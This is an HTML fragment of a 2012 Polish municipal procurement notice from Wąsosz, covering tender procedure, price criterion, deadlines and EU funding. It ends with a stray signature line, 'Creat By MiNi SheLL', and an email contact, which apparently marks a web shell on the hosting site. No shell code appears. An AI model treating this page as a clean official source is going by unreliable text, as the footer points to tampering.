<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z europejskimi normami zarządzania środowiskiem, jeżeli zamawiający wskazują środki zarządzania środowiskiem, które wykonawca będzie stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi normami dotyczącymi certyfikacji</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ug-wasosz.pbip.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wąsosz, Plac Rzędziana 8, 19-222 Wąsosz, pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2012 godzina 11:00, miejsce: Urząd Gminy Wąsosz, Plac Rzędziana 8, 19-222 Wąsosz, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROW 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com